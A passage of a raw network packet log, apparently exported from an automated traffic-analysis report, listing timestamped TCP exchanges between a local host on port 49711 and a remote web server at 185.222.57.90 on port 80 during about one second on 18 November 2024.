                                            Nov 18, 2024 18:11:16.708863974 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:16.708877087 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:16.708889961 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:16.708892107 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:16.708910942 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:16.708933115 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:16.715008974 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:16.715029001 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:16.715101004 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:16.715137005 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:16.715154886 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:16.715171099 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:16.715204954 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:16.715265989 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:16.822288036 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:16.822371006 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:16.822390079 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:16.822427034 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:16.822463036 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:16.823030949 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:16.823048115 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:16.823093891 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:16.823123932 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:16.823517084 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:16.823533058 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:16.823548079 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:16.823568106 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:16.823594093 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:16.824194908 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:16.824212074 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:16.824246883 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:16.824270964 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:16.824548006 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:16.824564934 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:16.824593067 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:16.824610949 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:16.937824965 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:16.937918901 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:16.937931061 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:16.937935114 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:16.937978029 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:16.937978029 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:16.938359976 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:16.938371897 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:16.938419104 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:16.938836098 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:16.938846111 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:16.938853025 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:16.938916922 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:16.939455986 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:16.939521074 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:16.940246105 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:16.940329075 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:16.940390110 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:16.940402031 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:16.940448046 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:16.940836906 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:16.940848112 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:16.940887928 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:16.941266060 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:16.941276073 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:16.941315889 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.086539984 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.086565971 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.086582899 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.086817026 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.087001085 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.087018967 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.087090969 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.087404013 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.087419987 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.087435007 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.087460041 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.087480068 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.088102102 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.088119030 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.088162899 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.088557005 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.088573933 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.088591099 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.088618994 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.088654995 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.099957943 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.100008011 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.100178003 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.168196917 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.168276072 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.168306112 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.168333054 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.168346882 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.168365955 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.168581009 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.168591976 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.168623924 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.168884039 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.168936014 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.169150114 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.169161081 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.169292927 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.171137094 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.171148062 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.171164036 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.171175003 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.171185017 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.171205997 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.171232939 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.171466112 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.171540976 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.171680927 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.171693087 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.171755075 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.171755075 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.172089100 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.172100067 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.172151089 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.173605919 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.173626900 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.173665047 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.173691988 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.215079069 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.215157032 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.215161085 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.215194941 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.283687115 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.283709049 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.283778906 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.283803940 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.283845901 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.284146070 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.284161091 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.284174919 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.284190893 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.284218073 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.284431934 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.284447908 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.284473896 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.284502983 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.284703970 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.284754992 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.286096096 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.286159992 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.286348104 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.286366940 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.286389112 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.286417961 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.286997080 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.287014961 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.287046909 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.287062883 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.287341118 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.287357092 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.287385941 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.287403107 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.287595034 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.287638903 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.288760900 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.288808107 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.288846970 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.288888931 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.330436945 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.330501080 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.330549955 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.330621004 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.398849010 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.398885965 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.398930073 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.398955107 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.398961067 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.398986101 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.399194956 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.399209023 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.399233103 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.399255037 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.399525881 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.399538994 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.399563074 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.399580956 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.399971008 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.399986982 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.400007963 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.400029898 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.401572943 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.401617050 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.401643991 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.401676893 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.401698112 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.401732922 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.401990891 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.402004004 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.402017117 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.402034044 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.402066946 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.402486086 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.402498960 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.402525902 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.402540922 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.403898954 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.403939962 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.403973103 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.404007912 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.404028893 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.404063940 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.404205084 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.404239893 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.445852995 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.445892096 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.445925951 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.445969105 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.514400959 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.514453888 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.514467001 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.514554024 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.514619112 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.514759064 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.514771938 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.514786005 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.514816046 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.514841080 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.515275955 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.515291929 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.515340090 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.517086029 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.517137051 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.517232895 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.517249107 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.517291069 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.517559052 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.517573118 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.517585039 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.517586946 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.517602921 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.517621040 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.518296003 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.518310070 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.518346071 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.519368887 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.519413948 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.519493103 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.519505024 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.519534111 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.519553900 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.519660950 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.519701958 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.561665058 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.561686993 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.561703920 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.561781883 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.561841965 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.629756927 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.629812956 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.629868031 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.629880905 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.629914999 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.629935980 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.630135059 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.630153894 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.630171061 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.630181074 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.630211115 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.630804062 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.630857944 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.632409096 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.632597923 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.632608891 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.632613897 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.632677078 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.632848024 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.632865906 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.632883072 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.632904053 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.632949114 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.633611917 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.633631945 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.633657932 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.633698940 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.634661913 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.634706974 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.634741068 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.634783983 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.676245928 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.676300049 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.676403999 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.676445007 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.676484108 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.676583052 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.676598072 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.676623106 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.676651001 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.745091915 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.745177984 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.745191097 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.745214939 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.745296001 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.745507956 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.745520115 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.745551109 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.745588064 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.746001959 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.746015072 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.746028900 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.746042967 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.746079922 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.747716904 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.747773886 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.747862101 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.747873068 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.747905016 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.747932911 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.748090029 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.748135090 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.748146057 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.748167038 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.748199940 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.748199940 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.748913050 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.748974085 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.791193008 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.791239977 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.791256905 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.791306973 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.791460991 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.791508913 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.791754961 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.791795969 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.791898012 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.791909933 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.791939020 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.791960001 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.792208910 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.792218924 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.792243004 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.792282104 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.860388041 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.860430002 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.860455036 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.860462904 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.860532045 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.860532045 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.860702038 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.860744953 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.860745907 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.860761881 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.860783100 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.860799074 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.861444950 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.861464024 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.861486912 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.861510038 CET4971180192.168.2.8185.222.57.90
